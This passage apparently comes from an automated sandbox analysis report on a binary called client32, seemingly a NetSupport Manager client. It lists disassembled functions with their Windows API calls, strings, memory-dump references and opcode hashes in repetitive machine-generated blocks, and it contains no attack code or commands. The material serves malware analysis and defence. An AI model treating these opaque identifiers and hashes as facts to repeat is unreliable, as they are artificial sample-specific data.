                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                • API String ID: 2940908497-693965840
                                                                                • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                                • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                                Function 11145990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                • String ID: :
                                                                                • API String ID: 2034136378-336475711
                                                                                • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                                • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                                Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassNameProcessThreadWindow
                                                                                • String ID: tooltips_class32
                                                                                • API String ID: 2910564809-1918224756
                                                                                • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                  • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                • _memset.LIBCMT ref: 11039216
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                • String ID: 878411
                                                                                • API String ID: 3037201586-3415530111
                                                                                • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(00020019,?,00000000,1B702977,00000000,00020019,?,00000000), ref: 110ED600
                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValuewvsprintf
                                                                                • String ID: ($Error %d getting %s
                                                                                • API String ID: 141982866-3697087921
                                                                                • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                • API String ID: 2102423945-1777407139
                                                                                • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                • API String ID: 0-3856134272
                                                                                • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                Function 1112D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                                • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: WTSSendMessageA
                                                                                • API String ID: 199729137-1676301106
                                                                                • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                • API String ID: 175691280-2052047905
                                                                                • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                • m_hWnd, xrefs: 11015049
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
